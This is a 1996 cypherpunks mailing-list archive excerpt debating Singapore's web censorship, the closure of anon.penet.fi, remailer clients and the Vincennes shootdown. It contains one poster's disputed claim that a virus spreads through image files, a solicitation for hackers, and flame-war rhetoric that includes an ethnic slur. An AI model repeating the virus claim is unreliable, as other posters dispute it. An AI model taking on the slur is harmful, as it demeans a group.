> pseudonym address to use on various support groups can get them from other,
> equally insecure, remailers.

I believe that Private Idaho is a cypherpunks remailer client for Windows.

- Igor.

From jseng at pobox.org.sg Sun Sep 1 18:21:59 1996
From: jseng at pobox.org.sg (James Seng)
Date: Mon, 2 Sep 1996 09:21:59 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To:
Message-ID:

On Sat, 31 Aug 1996, Timothy C. May wrote:
> The point is to make clear to them that the Usenet and similar Web sites
> are global in nature, not subject to censorship without a very high local
> cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
> Singaporans will have to choose not to carry the various newsgroups into
> which *I* post such messages!

Just let to add my comment in regard to this unfortunate discussion.

To understand the situation better, you should not impose America ideology and perspection on how things to be done to Singapore. Singapore maybe young but there are certain culture too.

Most importantly, the move to censor certain WWW site actually comes as a relief to many people, especially parents who worried about the bad influence of it.
We can go into the same discussion about whose responsibility it is but before you do that, please bear in mind that this is Singapore. As an example of what i mean, few years back, when they introduced R rating movies uncensored in Singapore for people above 18, it cause a surge in soft-porn movie to be screened. There is a general dissatisfaction among the people and the government was forced to shift the age limit to 21. And then later revised the R rating to R(A), where A stands for artistic which rules out soft-porn. It may be surprising but many people (in Singapore) do welcome censorship sad to say.

In addition, you need to see the method of censorship deployed in Singapore. For press media like papers and magazine, it is done in a passive manner. They _do not_ read every issue of every magazine available in Singapore. They only do so when there is enough complaints. For example, the incident of "Wired" banning due to the article "Disney with a Death Penalty" was prompted by complaints by the public before action is done. (This is related to me by some frens of mine working in the ministry who is directly involved in the incident). Similarly, they are deploying the same method to WWW.

One more point. They know it is impossible to censor everything. It is possible for me to order Wired directly from US. But still they do it. To quote, "We are doing it for the sake of doing it. The intention is to make it difficult to access to such information although we know it is impossible to prevent all." (I may missed some words but the idea is that). I have a long argument with this person, telling him that despite what they have done, i could still access to those stuff which they ban. his reasoning is "how many people can do it? 10%? 5%? That's fine with us. If the people really wants it, they can get it".

In actual fact, the move to put all people on proxy was not a surprise to many of us. The first time i know of such an intention was in Aug 95, which is one year back.
They _have_ been doing studies and testing since then. The ISPs have been well informed and have been doing their own testing too since then.

I am writing this based on an experience in Singapore for more than 12 yrs (Yes, i am not a Singaporean). if you wish to rebuke the points which i mention above, please feel free to do so but do so in the context wrt Singapore culture. Do not impose the general ideology and culture within your country into your argument. (Oh yea, don't give me the "Bull shit! This fren of mine so-and-so have said that ....". We talking about general ideology of the people, not of a single person)

Lastly, do _not_ misunderstand that i support the censorship. I never do and never will. Nor do i really feels that what they doing are right. There are some people like me who disapproved the moves but the voice is really too small to make a difference...yet.

> To be blunt, if Singapore wants to stop me from discussing the dictator Yew
> and his feeble son, they can't. Except by pulling the plugs on forums in
> which my posts are carried. I consider this a Good Thing (that politicians
> in Country A generally have no power to tell citizen-units in Country B
> what they can say and what they can't).

Now, what makes you think that citizen of Country A has the power or rights to tell politicians of Country B what to do and what they cannot do? Just wondering.

ps: Sorry for the off-topic discussion.

-James Seng

From charlee at netnet.net Sun Sep 1 18:22:43 1996
From: charlee at netnet.net (kickboxer)
Date: Mon, 2 Sep 1996 09:22:43 +0800
Subject: HAZ-MAT virus
Message-ID: <199609012319.SAA18515@netnet1.netnet.net>

I do not know how it is run by the JPG and GIF files, but I do know that the code somehow loads into the image viewer itself..I am not sure how it works, just that it is very destructive.. I had it destroy my 486 (using Lview Pro) Oh, well, ENOUGH already.
if you have something to say that is related to "image files can't execute a virus" please do not. there are too many spams with those ideas out now

From patrickbc at juno.com Sun Sep 1 18:22:46 1996
From: patrickbc at juno.com (patrick b cummings)
Date: Mon, 2 Sep 1996 09:22:46 +0800
Subject: No Subject
Message-ID: <19960831.181353.9134.9.patrickbc@juno.com>

need more hackers for the list please send following info to me handle e-mail address P.O. Box url type of hacking you do

From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 1 18:22:48 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Mon, 2 Sep 1996 09:22:48 +0800
Subject: "Security risks" vs. "credit risks"
Message-ID: <01I8Z52F4F5S9JDHU2@mbcl.rutgers.edu>

According to the WaP article, the database in question would be _required_ by the federal government... thus removing any voluntary aspect of it, so long as you want to fly on a plane.

I have had the thought that it might be possible for an air cargo business to have as a stock benefit a guarantee that, for payment of any extra costs, any stockholder could ride on one of their planes. I don't know how the laws on the subject are worded, but I believe that a lot of restrictions are removed for planes other than standard passenger airlines. This might be a way to fly anonymously - Chaumian "is-a-stockholder" credentials might be usable to arrange it (the local library's copy of Applied Cryptography is checked out, so I don't know for sure) anonymously.

-Allen

From dlv at bwalk.dm.com Sun Sep 1 18:29:30 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Sep 1996 09:29:30 +0800
Subject: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <19960830.170609.9758.0.patrickbc@juno.com>
Message-ID:

patrickbc at juno.com (patrick b cummings) writes:
> jimbell,
> I agree with what you are saying but not all politicians are that bad.
> You make it sound as if there are no politicians are for freedom of the
> net.
But of course - all politicians are scum. No decent person would want to be a politician. Anyone who's willing to become a politician is scum.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From MAILER-DAEMON at mqg-smtp3.usmc.mil Sun Sep 1 19:02:16 1996
From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil)
Date: Mon, 2 Sep 1996 10:02:16 +0800
Subject: Undeliverable Message
Message-ID:

To:
Cc:
Subject: Re: It is good that anon.penet.fi has been closed!

Message not delivered to recipients below. Press F1 for help with VNM error codes.

VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER

VNM3043 -- MAILBOX IS FULL

The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered.

The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER).

When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages.

UNDEFINED
-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:
> Yes, subject says it all. anon.penet.fi was a whole lot worse than
> cypherpunks remailers. It provided clueless users with no real security,
> because it stored return addresses and did not use chaining and
> encryption.

It also provided anonymity to many people who needed it. I think that many people who need anonymity will probably just learn faking mail and news headers. Many people just don't want to deal with cpunk remailers. OTOH, I agree that this might actually force many people with Penet addresses to learn about more secure remailers.
In this way, the closing of anon.penet.fi could be looked upon as a Good Thing. However, as long as there is no easy way for Windoze and Mac users to use secure remailers, users will sooner resort to fake-mailing than learning how to use cpunk remailers. People that need a pseudonym address to use on various support groups can get them from other, equally insecure, remailers.

- -- Mark
PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From jburrell at crl.com Sun Sep 1 19:19:04 1996
From: jburrell at crl.com (Jason Burrell)
Date: Mon, 2 Sep 1996 10:19:04 +0800
Subject: anon.penet.fi: URGENT REQUEST
Message-ID: <199609020012.UAA12054@spirit.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

> ! on a dedicated 28.8 PPP line. The cheapest used VGA display from
> ! the nearby waste dump will work just fine.
>
> Hell, any monitor should work! I'm curious about how to go about
> acquiring one of those huge 100+ x 100+ character terminals that linux
> supports. Is it practical, cheap and readable?

If you mean something like a 132x60 character terminal, you can get a utility from Sunsite called SVGATextMode which will do that for you on a standard VGA monitor, provided you have a graphics card which supports such a mode. I have an STB Nitro 2MB ISA card, and am running a 132x60 mode on a 14 inch monitor.

> ln -s /dev/null /usr/postmaster
> ln -s /dev/null /usr/abuse

I think you mean /usr/spool/mail/postmaster, but I could be wrong.
;)

> That should filter the mail quite nicely! :->

Indeed. :)

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From bf578 at scn.org Sun Sep 1 19:27:10 1996
From: bf578 at scn.org (SCN User)
Date: Mon, 2 Sep 1996 10:27:10 +0800
Subject: FW: get me off of this list!!!!!
Message-ID: <199609020042.RAA12094@scn.org>

>
>>> wrote:
>>>I need to be taken off of this list but I can't remeber the code
>>>
>>>to desubscribe. Can anyone tell me what the code is?
>>>-------------------------------------
>>
>>What's the frequency Herbert?
>>
>>Help, I've fallen and I can't remeber the code.
>>
>>Hint: Try consulting "The Codebreakers."
>
>I guess he deleted that all important message he got when he
> duhscribed.
>
>it went something like this...
>Welcome to the cypherpunks mailing list!
>
>[...]
>If you ever want to remove yourself from this mailing list,
>
>[...]
>(and wanting to get off the list is never an emergency)
>
>[...]
>Do not mail to the whole list asking to be removed. It's rude.
>
>[...]
>

--
------------------------------------------
There are no facts, only interpretations.
I always wanted to be somebody, but I should have been more specific.

From furballs at netcom.com Sun Sep 1 19:41:29 1996
From: furballs at netcom.com (Paul S. Penrod)
Date: Mon, 2 Sep 1996 10:41:29 +0800
Subject: HAZ-MAT virus
In-Reply-To: <199609012319.SAA18515@netnet1.netnet.net>
Message-ID:

First, the HAZ-MAT is a polymorphic virus. It is not run by any data file (GIF, JPG or otherwise).

Second. I had a private message sent to me from someone who suffered at the hands of this virus and described the effects.
From the description it indicates the use of a possible boot or hidden sector residency with low level ATA-3 command capability to zap IDE drives. This is nothing new, or magical.

Third. The HAZ-MAT virus has been documented to have been transported via a rogue copy of EudoraPro in zip format, plus one other EXE (non-image application).

This is not spam, just facts...

On Sun, 1 Sep 1996, kickboxer wrote:
> I do not know how it is run by the JPG and GIF files, but I do know that the
> code somehow loads into the image viewer itself..I am not sure how it works,
> just that it is very destructive.. I had it destroy my 486 (using Lview Pro)
> Oh, well, ENOUGH already. if you have something to say that is related to
> "image files can't execute a virus" please do not. there are too many spams
> with those ideas out now
>
>
>

From patrickbc at juno.com Sun Sep 1 19:42:20 1996
From: patrickbc at juno.com (patrick b cummings)
Date: Mon, 2 Sep 1996 10:42:20 +0800
Subject: No Subject
Message-ID: <19960831.193316.9134.18.patrickbc@juno.com>

what do you know about hackers

From angelos at gradin.cis.upenn.edu Sun Sep 1 19:50:32 1996
From: angelos at gradin.cis.upenn.edu (Angelos D. Keromytis)
Date: Mon, 2 Sep 1996 10:50:32 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com>
Message-ID: <199609020051.UAA14557@gradin.cis.upenn.edu>

-----BEGIN PGP SIGNED MESSAGE-----

In message <19960901220323595.AAA208 at Esther.edventure.com>, Esther Dyson writes :
>Now, speaking personally: I believe there are trade-offs -- which is what I
>told the LA Times. I assume I was quoted accurately (although the word
>"enforce" is awkward), but out of context. Anonymity can be dangerous --
>as can traceability, especially in/by repressive regimes. Therefore I would
>favor allowing anonymity -- with some form of traceability only under terms
>considerably stronger than what are generally required for a wiretap.
>Anyone who seriously needs anonymity because of a repressive government is
>likely to use a foreign (outside whatever jurisdiction he fears) server, so
>that this is not a matter of "local" laws. The tracer would have to pass
>through what I hope would be tighter hoops than we have now.
>

Just a small parenthesis at this point: traceability can be dangerous even in non-repressive regimes; there is information about oneself which, although far from illegal or "top secret", is not exactly for the whole world to know; this sort of information includes, but is not limited to, financial transactions, product preferences, habits, hobbies etc. My feeling is that it's better to devise ways to prevent a digital crime (for lack of better term) than try to find and punish the culprit(s). Of course, this applies to SOME services (i don't expect anonymous contracts to become very popular), for which anonymity makes sense. But the infrastructure has to be there, IMNSHO.

Just my $0.02 (+tax).
- -Angelos

PS. An interesting thing to consider is whether traceability in a service should be inherent to it or enforced by policy.

From drose at AZStarNet.com Sun Sep 1 19:53:03 1996
From: drose at AZStarNet.com (David M. Rose)
Date: Mon, 2 Sep 1996 10:53:03 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <199609020056.RAA15989@web.azstarnet.com>

Dear Ms. Dyson:

As a result of my knowing something of your work and additionally having viewed your highly impressive performance on Bill Buckley's CDA debate program, I used to think a great deal of you. And, as a matter of fact, I suppose that I still do.
I am frankly troubled, however, by my _impression_ of your beliefs in the abovereferenced matter. Perhaps I have misunderstood your recent post to Cypherpunks; indeed, I am certain that all will be elucidated after you have had an opportunity to review more fully the article in question.

I look forward to reading your further thoughts.

Sincerely,
-David M. Rose

From alanh at infi.net Sun Sep 1 20:01:31 1996
From: alanh at infi.net (Alan Horowitz)
Date: Mon, 2 Sep 1996 11:01:31 +0800
Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
In-Reply-To: <199609011605.MAA26536@gradin.cis.upenn.edu>
Message-ID:

The Aegis ship in the Gulf was not in an exercise. It was in a war zone.

If my memory serves, the Iranian jetliner had its squawker turned off, or broken. The officer in charge in the CIC had about ten seconds to decide if he was about to be locked-on by a missile. And no real information to make the decision with.

From tcmay at got.net Sun Sep 1 20:09:30 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 11:09:30 +0800
Subject: PLEASE Nuke Singapore Back into the Stone Age
Message-ID:

At 11:06 PM 9/1/96, James Seng wrote:
>To understand the situation better, you should not impose America
>ideology and perspection on how things to be done to Singapore. Singapore
>maybe young but there are certain culture too.

Who says this has anything to do with "American ideology"? The Usenet is propagated around the world. All we are saying is that honest commentary on the corruption of Lee Kwan Yew (and his billion dollars in Australian and European banks) will be reported on the Usenet. This is not "imposing American ideology" on anyone.

Singapore, being the dynastic dictatorship that it is, may decide to block access all newsgroups which discuss Yew's tyranny, or pornography, or pro-Malay sentiment, or anything else banned in the Benevolent Republic of Singapore. This will be their choice, to ban access by citizen-units to Evil Thoughts.
It is not an issue of "imposing American ideology" on the helpless in Singapore, any more than a book or magazine is "imposing" an ideology.

It sounds to me, James, that you need to get out of Singapore and visit a country where free speech and free ability to read material is not treated as "imposed foreign ideologies."

(I think you also need to look up what "imposed" means. The "Wired" magazine banned in Singapore is not something that is ever "imposed" on others....anyone is free to simply not read the magazine!)

>is Singapore. As an example of what i mean, few years back, when they
>introduced R rating movies uncensored in Singapore for people above 18,
>it cause a surge in soft-porn movie to be screened. There is a general

So? Your point being? After all, nobody is forcing _you_ to go watch these R-rated movies. You are free to not watch if you find them offensive.

In a free society this is how things work. I think you'll find this mailing list anathema to your apparent ideology.

...
>Singapore culture. Do not impose the general ideology and culture within
>your country into your argument. (Oh yea, don't give me the "Bull shit!
...
>Now, what makes you think that citizen of Country A has the power or
>rights to tell politicians of Country B what to do and what they cannot do?
>Just wondering.

Again, you really need to look up the meaning of "impose" more carefully. By posting a comment about how Singapore sucks, or how Lee Kwan Yew raped his country and deposited his profits in Australian and European banks, just what am I "imposing" on Singaporans or anyone else?

I think you have little understanding of how the global Internet works.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Licensed Ontologist | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From minow at apple.com Sun Sep 1 20:11:50 1996
From: minow at apple.com (Martin Minow)
Date: Mon, 2 Sep 1996 11:11:50 +0800
Subject: Desubscribe
In-Reply-To: <199609011607.JAA22532@dns1.noc.best.net>
Message-ID:

"James A. Donald" , writes:
>I heard on talk.politics.guns somebody say that in Sweden they
>had banned knives with a sharp point at the end, and were going
>to ban sharp knives altogether. I think he was just engaging in
>hyperbole, that he really meant that gun control in Sweden was
>unreasonably strict, but on reflection I am not sure.
>

In a survey conducted in Sweden a few years ago, 50% of Swedish households had access to guns (generally military service weapons and sporting shotguns). Guns are, however, licensed and regulated, and seldom used in crimes. Licenses for "personal protection" are almost unobtainable. At least one military officer was court martialed when his service revolver was stolen from his automobile. The most significant "mass murderer" crimes in Sweden (one last year and one in the 1970's) were caused by people who used their legally-obtained military weapons.
Martin Minow (ex-resident of Sweden) minow at apple.com From patrickbc at juno.com Sun Sep 1 20:22:30 1996 From: patrickbc at juno.com (patrick b cummings) Date: Mon, 2 Sep 1996 11:22:30 +0800 Subject: No Subject Message-ID: <19960831.201554.9134.24.patrickbc@juno.com> Please send me information on hacking bbs Hackmaster-p Patrickbc at juno.com From ichudov at algebra.com Sun Sep 1 20:24:03 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 11:24:03 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: <199609020116.UAA01684@manifold.algebra.com> James Seng wrote: > > On Sat, 31 Aug 1996, Timothy C. May wrote: > > The point is to make clear to them that the Usenet and similar Web sites > > are global in nature, not subject to censorship without a very high local > > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then > > Singaporans will have to choose not to carry the various newsgroups into > > which *I* post such messages! > > Just let to add my comment in regard to this unforuntate discusssion. > > To understand the sitution better, you should not impose America > idealogy and perspection on how things to be done to Singapore. Singapore > maybe young but there are certain culture too. > > Most importantly, the move to censor certain WWW site actually comes as a > relieve to many people, especially parents who worried about the bad > influence of it. We can go into the same discussion about whose > responsibilty it is but before you do that, please bear in mind that this > is Singapore. America is much less different from Singapore in that respect than you might think. igor From angelos at gradin.cis.upenn.edu Sun Sep 1 20:25:38 1996 From: angelos at gradin.cis.upenn.edu (Angelos D. Keromytis) Date: Mon, 2 Sep 1996 11:25:38 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. 
(fwd)
In-Reply-To:
Message-ID: <199609020111.VAA15203@gradin.cis.upenn.edu>

-----BEGIN PGP SIGNED MESSAGE-----

In message , Alan Horowitz writes:
>The Aegis ship in the Gulf was not in an exercise. It was in a war zone.
>
>If my memory serves, the Iranian jetliner had its squawker turned off, or
>broken. The officer in charge in the CIC had about ten seconds to decide
>if he was about to be locked-on by a missile. And no real information to
>make the decision with.

There's still the possibility that something malfunctioned (but not fatal - otherwise - for the plane). I'm not saying it's what happened, but it's a distant possibility.
- -Angelos

From adam at homeport.org Sun Sep 1 20:35:19 1996
From: adam at homeport.org (Adam Shostack)
Date: Mon, 2 Sep 1996 11:35:19 +0800
Subject: Conservation Laws, Money, Engines, and Ontology
In-Reply-To:
Message-ID: <199609020218.VAA25795@homeport.org>

Tim raises some interesting points, I'd like to focus in on one small section, that of controlling what software runs on a machine.

I have no issue with a user choosing the software that runs, but let's consider the Microsoft CAPI model. In it, there is control over what runs, but it exists at the vendor level. This is moving away from the personal computer, and back to the timeshare model, where control over what you run is partially in the hands of the vendor. Giving up this control of your computer is a step in a dangerous direction.

However, creating 'execution kernels' with cryptographic authentication and resource controls is something that would be very useful in a number of places.
Tim's selling of CPU cycles, stamps and the like dovetails with something I wrote last December (www.homeport.org/~adam/java.html) on the need for granular controls in Java execution.

So, I'm in agreement that we need resource allocation controls, and I want to stress the need for those controls to be configured by the owner of the computer, not the author of an operating system, or by government policies. When they buy me a computer, they can decide what runs on it.

Adam

Timothy C. May wrote:
| Now, certainly I support the right of any person or machine to run programs
| freely and without charge, to pass on e-mail free of charge, to run
| remailers for no charge, to accept spam mail without complaint, and so on.
|
| What I'm suggesting is that many of the problems being seen with overuse of
| resources, spam, congestion, and denial of service are really due to a poor
| model of resource allocation. Unix and other modern operating systems offer
| various tools for helping to constrain such problems, but, I submit, better
| methods are needed.

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From ses at tipper.oit.unc.edu Sun Sep 1 21:45:14 1996
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Mon, 2 Sep 1996 12:45:14 +0800
Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
In-Reply-To:
Message-ID:

On Sun, 1 Sep 1996, Alan Horowitz wrote:

> The Aegis ship in the Gulf was not in an exercise. It was in a war zone.
>
> If my memory serves, the Iranian jetliner had its squawker turned off, or
> broken. The officer in charge in the CIC had about ten seconds to decide
> if he was about to be locked-on by a missile. And no real information to

I think it was actually a combination of a design flaw in the user interface for the control system combined with a human error that led to the radar officer confusing the airbus with an (F4?) a hundred miles away that he'd previously clicked on.
-----
Cause maybe (maybe) | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all | Email address remains unchanged
You're my firewall - | ........First in Usenet.........

From amehta at giasdl01.vsnl.net.in Sun Sep 1 21:48:55 1996
From: amehta at giasdl01.vsnl.net.in (Arun Mehta)
Date: Mon, 2 Sep 1996 12:48:55 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <1.5.4.32.19960902014136.002fc4b4@giasdl01.vsnl.net.in>

At 10:35 31/08/96 -0700, Timothy C. May wrote:

> If discussions of Lee Kwan Yew's dynasty are considered illegal, then
>Singaporeans will have to choose not to carry the various newsgroups into
>which *I* post such messages!

How long do you propose to carry on doing that? Soon, the others in the newsgroups will be asking you very impolitely to stop, just as you would if someone kept on and on posting such stuff to cypherpunks.

>At 6:35 AM 8/31/96, Arun Mehta wrote:
>>Then again, inappropriate postings are the bane of the Internet: the consensus
>>on which the Net functions relies heavily on people not posting
>>inappropriately.
>This works imperfectly, as all long-time surfers of the Usenet will attest!

True, but Usenet only functions because it works most of the time. To the extent we subvert this consensus, we damage Usenet, make it less useful. It shouldn't happen that in trying to save or spread Usenet, we have to destroy it...

>And _never_ has it involved determinations of "inappropriate" by
>_governments_!

There I'm with you -- I'm merely suggesting that you find a way to protest Singapore's actions in a manner that would be less objectionable to most Internet users, in Singapore and outside.

>The point of being sometimes "impolite" (*) is to "force their hand."
I never said anything about politeness -- the appropriateness I was talking about was in the context of what the people posting to a discussion group consider proper material for them to receive, not what the government of Singapore thinks.

In any case, I think we may be slightly going off track as far as the current Singapore problem is concerned. They are blocking access to certain web sites from mid September -- Usenet isn't part of the current discussion, far as I know.

Arun Mehta Phone +91-11-6841172, 6849103
amehta at cpsr.org http://www.cerfnet.com/~amehta/
finger amehta at cerfnet.com for public key

From tcmay at got.net Sun Sep 1 22:23:28 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 13:23:28 +0800
Subject: American Imperialism, Firing Squads, and the Vincennes Shootdown
Message-ID:

At 1:03 AM 9/2/96, Alan Horowitz wrote:
>The Aegis ship in the Gulf was not in an exercise. It was in a war zone.
>
>If my memory serves, the Iranian jetliner had its squawker turned off, or
>broken. The officer in charge in the CIC had about ten seconds to decide
>if he was about to be locked-on by a missile. And no real information to
>make the decision with.

The U.S.S. Vincennes shot down an Iranian commercial airliner that was in its normal and well-known flight path out of Bandar Abbas. That the U.S. felt it was in a "war zone" was due to American imperialistic sentiments that say the U.S. can and should send its police forces to distant parts of the globe, even inside the Persian Gulf, no more than a few dozen miles from Iranian shores.

(And the godless Jew Persians had the audacity to patrol its shorelines with gunboats! Jeesh. I'm sure the U.S. would not send the Coast Guard out to investigate or harass foreign warships cruising inside Chesapeake Bay, San Francisco Bay, or other coastal bays and inlets.)

As to the "squawker" being turned off, this is not my recollection of the case (though it was nearly a decade ago, so memories fade...).
(I just did an Alta Vista search to refresh my memory. Found this choice description:

"Anderson's job in "Air Alley," the row of operators who handled air warfare, was to identify any air traffic within range of the ship. He told the Aegis system to query the incoming plane: Identify, Friend or Foe? By standard practice, all planes carry a transponder that automatically answers the IFF query with Mode 1 or 2 (military), or Mode 3 (civilian). Anderson got a Mode 3. "Commair" (commercial airliner), he figured. He reached beside his console for the navy's listing of commercial flights over the gulf. But as he scanned the schedule, he missed Flight 655. Apparently, in the darkness of the CIC, its arc lights flickering every time the Vincennes's five-inch gun fired off another round at the hapless Iranian gunboats, he was confused by the gulf's four different time zones."

[http://www.waite.adelaide.edu.au/~aranjbar/Ali/pol/4]

So, the Iranian jet's IFF module _was_ working...the U.S. ship just missed it.

Fact is, the U.S. shot down a commercial airliner which was in its normal flight path! One can imagine the repercussions if TWA 800 was similarly shot down as it followed its ordinary flight path.

The U.S. demanded sanctions against the Soviets in '83 for shooting down a Korean airliner which had strayed (maybe) deep into Soviet airspace and which refused to acknowledge several radio messages. Though I am no apologist for the Soviets, which event was the more egregious?

That the U.S. demanded actions against the Sovs, but pooh-poohed and whitewashed the Iranian airliner shootdown, is evidence of imperialistic hypocrisy. That the U.S. demands trials for alleged terrorists while having no trial for Captain Rogers is further evidence of hypocrisy. (A military court martial and a firing squad for those found guilty might have sent a more consistent message.)
Make no mistake about it: I cannot support the sending of American gunboats to the backyards of other countries merely for perceived notions about American rights to their oil.

Hopefully, as crypto anarchy spreads, imperialism such as this will be undermined, destabilized, and ultimately be defeated.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Licensed Ontologist | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From markm at voicenet.com Sun Sep 1 22:32:32 1996
From: markm at voicenet.com (Mark M.)
Date: Mon, 2 Sep 1996 13:32:32 +0800
Subject: It is good that anon.penet.fi has been closed!
In-Reply-To: <199609012217.RAA00801@manifold.algebra.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

> I believe that Private Idaho is a cypherpunks remailer client for Windows.

True. But it is a separate program from email clients which means that anyone wanting to use Private Idaho has to download it, install it, and learn how to use it in conjunction with one's email program. Most people who may have a need for anonymity have probably never heard of PGP or Private Idaho. I think that until remailer functions are actually built into the programs that people use, remailer use will be rare.

- -- Mark

PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From frogfarm at yakko.cs.wmich.edu Sun Sep 1 22:36:10 1996
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Mon, 2 Sep 1996 13:36:10 +0800
Subject: It is good that anon.penet.fi has been closed!
In-Reply-To:
Message-ID: <199609020313.XAA04501@yakko.cs.wmich.edu>

> headers. Many people just don't want to deal with cpunk remailers. OTOH, I
> agree that this might actually force many people with Penet addresses to learn
> about more secure remailers. In this way, the closing of anon.penet.fi could
> be looked upon as a Good Thing. However, as long as there is no easy way for
> Windoze and Mac users to use secure remailers, users will sooner resort to
> fake-mailing than learning how to use cpunk remailers. People that need a
> pseudonym address to use on various support groups can get them from other,
> equally insecure, remailers.

I've put up a list of remailer front ends, sorted by platform, at

http://yakko.cs.wmich.edu/~frogfarm/free/crypt.html#private

I welcome all additions. Right now, I have links to Private Idaho (Windows), Yet Another NewsWatcher (Mac), and PGPMR/2 for OS/2 (requires MailReader/2).

Nym servers and cpunk remailers are poised to take off, if those who wish to use them are capable of learning. The rest of us can either try to teach 'em in a non-condescending manner, or continue to work on front end utilities.
--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch." -US Postal spokeswoman, quoted in AP 1/27/96. I don't know about you, but the only folks I know who'd enjoy seeing someone in uniform on their porch are leathermen...

From tcmay at got.net Sun Sep 1 22:43:55 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 13:43:55 +0800
Subject: Let's Nuke Singapore Back into the Stone Age
Message-ID:

At 1:41 AM 9/2/96, Arun Mehta wrote:
>At 10:35 31/08/96 -0700, Timothy C. May wrote:
>
>> If discussions of Lee Kwan Yew's dynasty are considered illegal, then
>>Singaporeans will have to choose not to carry the various newsgroups into
>>which *I* post such messages!
>
>How long do you propose to carry on doing that? Soon, the others
>in the newsgroups will be asking you very impolitely to stop,
>just as you would if someone kept on and on posting such stuff to cypherpunks.

Actually, we already have several examples of how this worked, including some cases I was directly involved in. During the Teale-Homulka trial in Canada, many of us (me, too) posted numerous articles about it to the various *.canada newsgroups, such as soc.culture.canada. Canada had the choice of instructing all ISPs to halt the *.canada newsgroups. There were no real complaints that I recall about messages being "off-topic," as they clearly were very much on-topic.

(Not that a few complaints have ever stopped me. While I don't spam newsgroups with auto-generated spam, I figure any article I take the time to actually write and that deals with the newsgroup involved, by my own standards, is fair game. My ISP can cancel my account if he feels I have spammed newsgroups in some way.)

My proposal is not to post anti-Singapore screeds to comp.lang.java or the like, but to post them to various groups Singaporeans and their neighbors might read.
If Singapore wishes to disconnect itself from soc.culture.singapore, this is their choice. Then, the attack can spread to various other groups Singaporeans might want to read....

(I call this a _good_ use of "info-terrorism.")

...
>True, but Usenet only functions because it works most of the
>time. To the extent we subvert this consensus, we damage Usenet,
>make it less useful. It shouldn't happen that in trying to save
>or spread Usenet, we have to destroy it...

Posting the Homulka stuff did not kill the Usenet. Posting the autopsy photos of Nicole Brown Simpson did not kill the Usenet. Posting the innards of RSA Data Security algorithms did not kill the Usenet.

If Canker and Sludgewell spam cannot kill the Usenet, if "Make Money Fast" noise cannot kill the Usenet, and if "Babes will fuck 4 U" posts cannot kill the Usenet, then surely some informative posts about the fascist Yew posted to various newsgroups of relevance to Singaporeans and Asians will not kill the Usenet!

>>And _never_ has it involved determinations of "inappropriate" by
>>_governments_!
>
>There I'm with you -- I'm merely suggesting that you find a way
>to protest Singapore's actions in a manner that would be less
>objectionable to most Internet users, in Singapore and outside.

Why? What is "objectionable" about exposing the truth about Lee Kwan Yew, his feeble son, and their dynasty? What is "objectionable" about teaching them how to use Web proxies, remailers, and other tools of liberty?

If the citizens find this stuff objectionable, they can simply not read the stuff! As with books, movies, and magazines. What could be more natural than this?

But of course it is the _rulers_ of these Asian kingdoms and satrapies which want the distribution of certain thoughts controlled and denied to their serfs and citizen-units.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
